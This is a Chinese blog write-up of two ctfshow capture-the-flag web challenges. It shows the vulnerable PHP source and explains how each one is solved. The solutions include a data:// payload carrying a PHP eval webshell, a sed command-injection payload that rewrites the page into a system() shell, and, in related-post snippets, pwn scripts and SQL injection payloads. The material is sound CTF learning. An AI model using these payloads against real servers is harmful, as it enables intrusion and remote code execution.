ctfshow单身狗 -- web

最新推荐文章于 2025-04-22 14:12:13 发布
最新推荐文章于 2025-04-22 14:12:13 发布
阅读量614 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cainsoftware/article/details/125904851

pass-01 web签到

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

看到入参file 判断项是 strrev(反转)==正常入参

刚开始考虑过弱等于绕过,但是include没啥用,

后来了解到  2个知识点,,

1.第一可以利用 data://伪协议,

2.php ?>后的内容不再进行运算

所以可以构造如下:

file=data://text/plain,<?php eval($_REQUEST[1]);?>

通过py反转构造完整payload

 签到题这么难?签到题不应该是有手就行的那种吗。

 PASS-02 easyPHP

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];

if(isset($cmd) && isset($param)){
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}

escapeshell用来做过滤,限制了字符串长度为3,

根据大牛提示经验 需要使用sed命令新建文件,用sed匹配参数正则来进行替换修改

sed 正则表达式 - sed 基础教程 - 简单教程,简单编程

先需要使用参数:

1. “/escap/d”   其中的d为的是删除 escap整行的限制

2.使用参数“s/shell_exec/system/g” 这里的s目的是替换 g 参数目的是为了全局,

完整payload=“cmd=sed&param=/escapeshell/d;s/shell_exec/system/g;w 99.php”

 

ctfshow | 单身杯dsb | pwn | ctfshow_OA
Dem1的博客
05-22 512
#create user&password -> login -> validate psn session -> from pwn import * p = remote("pwn.challenge.ctf.show",28156) #-----main -> menu #-----from main #-----create_new_user p.sendline('1') p.recvuntil('username :') p.sendline('pwn')#
CTFSHOW game-gyctf web2
这周末在做梦的博客
07-22 1497
反序列化增逃逸
看雪CTF 拯救单身 apwn
snowleopard_bin的博客
03-28 798
漏洞类型 堆的整数负数溢出 保护机制 全保护 关键代码 if ( two[v1] )//没考虑负数 { puts("Oh,singledog,changing your name can bring you good luck."); read(0, (void *)two[v1], 0x20uLL); printf("new name: %s", two[...
CTF 雪花隐写工具snow.exe
最新发布
gitblog_06702的博客
04-22 336
CTF 雪花隐写工具snow.exe 去发现同类优质开源项目:https://gitcode.com/ 欢迎来到本仓库,这里提供了CTF竞赛中常用的雪花隐写工具——snow.exe。该工具是一种功能强大的信息隐藏工具,可以在图片中嵌入秘密信息,而不被轻易发现。 snow.exe支持多种格式的图片文件,并提供简洁的命令行操作界面,操作简便,是CTF爱好者必备的工具之一。 使用说明 下载snow....
单身杯,Webweb签到
Pai_Space
07-15 901
单身杯,Webweb签到
[ctfshow 单身杯]web writeup&&学习一下sed awk基本用法
weixin_45751765的博客
06-08 1717
想起来之前比赛撞了 单身杯没打完 刚好来复现一下 data伪协议直接过 ?>截断就行poc 远程包含用?参数包含也可 三字长度命令 参数长度任意保证传入字符串参考 sed教程 流程:sed工作流程 sed不用任何语句时可以直接输出源文件内容 本着需要什么学什么的初心 我们直接看payload来学习 sed支持正则匹配 /esca/匹配到 escape行 d 将其删除 sed语句用;间隔开 s字符串替换 shell_exec -> system g为全局替换标志w 写入 -->可以看作cp的功能版 将
ctfshow 单身杯(dsb)
qq_29634299的博客
05-22 1370
OSINT 任性老板 用yandex识图搜到虎扑的关于这个点的信息 https://bbs.hupu.com/27645621.html 通过恢复知道这个店铺的名字叫左撇子私房面 通过百度搜索店面即可获得电话号码 蛤壳雪茄-1 谷歌识图找到原图 知道它是mary river aerodrome这个 搜索得到 搜索这第一个公司的名字即可得到公司网站得到flag re re签到 拖到 IDA中 f5反汇编,看到 if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabU
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 686
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 644
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
2024年网安最全ctfshow-WEB-web3_ctfshow web3
2401_84264610的博客
05-01 225
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 2128
自用
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctfshow | 单身杯dsb | pwn | pwn签到
Dem1的博客
05-22 475
from pwn import * p = remote('pwn.challenge.ctf.show',28018) #p =process('./pwn01') shell_here = 0x80484f6 payload = 'a'*(0x10+0x4) + p32(shell_here) p.sendline(payload) p.interactive()
ctfshow单身杯部分wp
m0_62422842的博客
07-09 1161
php伪协议,sed命令和awk命令的用法与应用。SSTI的绕过
PAT-A1121/B1065 Damn Single/单身 题目内容及题解
BourbonWhiskey 的博客
02-10 516
"Damn Single (单身)" is the Chinese nickname for someone who is being single. You are supposed to find those who are alone in a big party, so they can be taken care of. “单身”是中文对于单身人士的一种爱称。本题请你从上万人的大型...
CTFSHOW-单身杯(WEB部分复现WP)
qq_61620566的博客
11-15 4387
CTFSHOW单身杯赛后复盘
ctfshow单身
Landasika的博客
05-25 1602
ctfshow单身web1. web签到 题目代码如下: <?php # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-03-19 12:10:55 # @Last Modified by: h1xa # @Last Modified time: 2022-03-19 13:27:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com error_reporting(0);
PAT 乙级练习 1065 单身 - 超级详细的思路讲解
Gorgeoustray
04-21 1037
主要思路是不断地从 guests 中删去已经辨识过的 ID,并将单身的 ID 丢进 singles,直到 guests 空为止。
CTFShow-WEB(签到题~5) WP
PP Jun的博客
08-01 1124
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值